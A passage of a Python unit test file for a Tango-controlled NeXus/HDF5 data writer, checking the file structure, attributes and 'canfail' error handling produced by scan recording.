self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
cnt = dt.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
# ???????
# ! PNI self.assertEqual(mca.name, "mca")
# ????
self.assertEqual(mca.name, "data")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(self._mca1[i], value[0][i])
for i in range(len(value[0])):
self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_source")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecord_canfail(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/scantest2.h5' % os.getcwd()
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.XMLSettings = self._scanXml % fname
dp.Canfail = True
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.OpenEntry()
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{}')
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Record('{}')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
value = cnt.read()
# value = cnt[:]
for i in range(len(value)):
self.assertEqual(
value[i], numpy.finfo(getattr(numpy, 'float64')).max)
self.assertEqual(len(cnt.attributes), 6)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["nexdatas_canfail"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail")
self.assertEqual(at[...], "FAILED")
at = cnt.attributes["nexdatas_canfail_error"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail_error")
self.assertEqual(
at[...],
"('Data for /entry1:NXentry/instrument:NXinstrument"
"/detector:NXdetector/counter1 not found. DATASOURCE: CLIENT"
" record exp_c01', 'Data without value')\n('Data for "
"/entry1:NXentry/instrument:NXinstrument/detector:NXdetector"
"/counter1 not found. DATASOURCE: CLIENT record exp_c01',"
" 'Data without value')")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(numpy.finfo(getattr(numpy, 'float64')).max,
value[0][i])
for i in range(len(value[0])):
self.assertEqual(numpy.finfo(getattr(numpy, 'float64')).max,
value[1][i])
self.assertEqual(len(mca.attributes), 6)
at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["nexdatas_canfail"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail")
self.assertEqual(at[...], "FAILED")
at = mca.attributes["nexdatas_canfail_error"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail_error")
self.assertEqual(
at[...],
"('Data for /entry1:NXentry/instrument:NXinstrument/"
"detector:NXdetector/mca not found. DATASOURCE: CLIENT "
"record p09/mca/exp.02', 'Data without value')\n('Data for "
"/entry1:NXentry/instrument:NXinstrument/detector:NXdetector"
"/mca not found. DATASOURCE: CLIENT record p09/mca/exp.02', "
"'Data without value')")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
# cnt = dt.open("cnt1")
cnt = dt.open("counter1")
self.assertTrue(cnt.is_valid)
# ???
# self.assertEqual(cnt.name,"cnt1")
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
self.assertEqual(cnt.size, 2)
# print(cnt.read())
value = cnt[:]
for i in range(len(value)):
self.assertEqual(numpy.finfo(getattr(numpy, 'float64')).max,
value[i])
self.assertEqual(len(cnt.attributes), 6)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["nexdatas_canfail"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail")
self.assertEqual(at[...], "FAILED")
at = cnt.attributes["nexdatas_canfail_error"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail_error")
self.assertEqual(
at[...],
"('Data for /entry1:NXentry/instrument:NXinstrument/"
"detector:NXdetector/counter1 not found. DATASOURCE: CLIENT "
"record exp_c01', 'Data without value')\n('Data for "
"/entry1:NXentry/instrument:NXinstrument/detector:NXdetector"
"/counter1 not found. DATASOURCE: CLIENT record exp_c01', "
"'Data without value')")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = dt.open("data")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "data")
# self.assertEqual(mca.name,"mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
self.assertEqual(mca.shape, (2, 2048))
self.assertEqual(mca.dtype, "float64")
self.assertEqual(mca.size, 4096)
value = mca.read()
for i in range(len(value[0])):
self.assertEqual(
numpy.finfo(getattr(numpy, 'float64')).max,
value[0][i])
for i in range(len(value[0])):
self.assertEqual(
numpy.finfo(getattr(numpy, 'float64')).max,
value[1][i])
self.assertEqual(len(mca.attributes), 6)
at = mca.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_canfail"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail")
self.assertEqual(at[...], "FAILED")
at = mca.attributes["nexdatas_canfail_error"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_canfail_error")
self.assertEqual(
at[...],
"('Data for /entry1:NXentry/instrument:NXinstrument/detector"
":NXdetector/mca not found. DATASOURCE: CLIENT record "
"p09/mca/exp.02', 'Data without value')\n('Data for "
"/entry1:NXentry/instrument:NXinstrument/detector:NXdetector"
"/mca not found. DATASOURCE: CLIENT record p09/mca/exp.02', "
"'Data without value')")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
f.close()
finally:
if os.path.isfile(fname):
os.remove(fname)
# scanRecord test
# \brief It tests recording of simple h5 file
def test_scanRecord_canfail_false(self):
fun = sys._getframe().f_code.co_name
print("Run: %s.%s() " % (self.__class__.__name__, fun))
fname = '%s/scantest2.h5' % os.getcwd()
try:
dp = PyTango.DeviceProxy(self._sv.device)
self.assertTrue(ProxyHelper.wait(dp, 10000))
# print 'attributes', dp.attribute_list_query()
self.setProp(dp, "writer", "h5cpp")
dp.FileName = fname
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.ON)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.OpenFile()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.Canfail = False
dp.XMLSettings = self._scanXml % fname
self.assertEqual(dp.state(), PyTango.DevState.OPEN)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
dp.OpenEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.canfail, False)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.EXTRACT)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.myAssertRaise(Exception, dp.Record, '{}')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.canfail, False)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.FAULT)
self.assertEqual(dp.status(), self.__status[dp.state()])
self.myAssertRaise(Exception, dp.Record, '{}')
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.canfail, False)
self.assertEqual(dp.state(), PyTango.DevState.FAULT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseEntry()
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.state(), PyTango.DevState.FAULT)
self.assertEqual(dp.status(), self.__status[dp.state()])
dp.CloseFile()
self.assertEqual(dp.canfail, True)
self.assertEqual(dp.stepsperfile, 0)
self.assertEqual(dp.currentfileid, 0)
self.assertEqual(dp.state(), PyTango.DevState.FAULT)
self.assertEqual(dp.status(), self.__status[dp.state()])
# check the created file
f = H5CppWriter.open_file(fname, readonly=True)
f = f.root()
self.assertEqual(5, len(f.attributes))
self.assertEqual(f.attributes["file_name"][...], fname)
self.assertTrue(f.attributes["NX_class"][...], "NXroot")
self.assertEqual(f.size, 2)
en = f.open("entry1")
self.assertTrue(en.is_valid)
self.assertEqual(en.name, "entry1")
self.assertEqual(len(en.attributes), 1)
self.assertEqual(en.size, 2)
at = en.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXentry")
# ins = f.open("entry1/instrument:NXinstrument") #bad exception
# ins = f.open("entry1/instrument")
ins = en.open("instrument")
self.assertTrue(ins.is_valid)
self.assertEqual(ins.name, "instrument")
self.assertEqual(len(ins.attributes), 2)
self.assertEqual(ins.size, 1)
at = ins.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXinstrument")
at = ins.attributes["short_name"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "short_name")
self.assertEqual(at[...], "scan instrument")
det = ins.open("detector")
self.assertTrue(det.is_valid)
self.assertEqual(det.name, "detector")
self.assertEqual(len(det.attributes), 1)
self.assertEqual(det.size, 2)
at = det.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdetector")
# cnt = det.open("counter") # bad exception
cnt = det.open("counter1")
self.assertTrue(cnt.is_valid)
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
# self.assertEqual(cnt.shape, (1,))
self.assertEqual(cnt.dtype, "float64")
# self.assertEqual(cnt.size, 1)
cnt.read()
# value = cnt[:]
# for i in range(len(value)):
# self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
mca = det.open("mca")
self.assertTrue(mca.is_valid)
self.assertEqual(mca.name, "mca")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(mca.shape), 2)
# self.assertEqual(mca.shape, (2,2048))
self.assertEqual(mca.dtype, "float64")
# self.assertEqual(mca.size, 4096)
mca.read()
# for i in range(len(value[0])):
# self.assertEqual(self._mca1[i], value[0][i])
# for i in range(len(value[0])):
# self.assertEqual(self._mca2[i], value[1][i])
self.assertEqual(len(mca.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = mca.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = mca.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "")
at = mca.attributes["nexdatas_source"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
dt = en.open("data")
self.assertTrue(dt.is_valid)
self.assertEqual(dt.name, "data")
self.assertEqual(len(dt.attributes), 1)
self.assertEqual(dt.size, 2)
at = dt.attributes["NX_class"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "NX_class")
self.assertEqual(at[...], "NXdata")
# cnt = dt.open("cnt1")
cnt = dt.open("counter1")
self.assertTrue(cnt.is_valid)
# ???
# self.assertEqual(cnt.name,"cnt1")
self.assertEqual(cnt.name, "counter1")
self.assertTrue(hasattr(cnt.shape, "__iter__"))
self.assertEqual(len(cnt.shape), 1)
# self.assertEqual(cnt.shape, (2,))
self.assertEqual(cnt.dtype, "float64")
# self.assertEqual(cnt.size, 2)
# print(cnt.read())
cnt[:]
# for i in range(len(value)):
# self.assertEqual(self._counter[i], value[i])
self.assertEqual(len(cnt.attributes), 4)
at = cnt.attributes["nexdatas_strategy"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "nexdatas_strategy")
self.assertEqual(at[...], "STEP")
at = cnt.attributes["type"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "type")
self.assertEqual(at[...], "NX_FLOAT")
at = cnt.attributes["units"]
self.assertTrue(at.is_valid)
self.assertTrue(hasattr(at.shape, "__iter__"))
self.assertEqual(len(at.shape), 0)
self.assertEqual(at.shape, ())
self.assertEqual(at.dtype, "string")
self.assertEqual(at.name, "units")
self.assertEqual(at[...], "m")
at = cnt.attributes["nexdatas_source"]
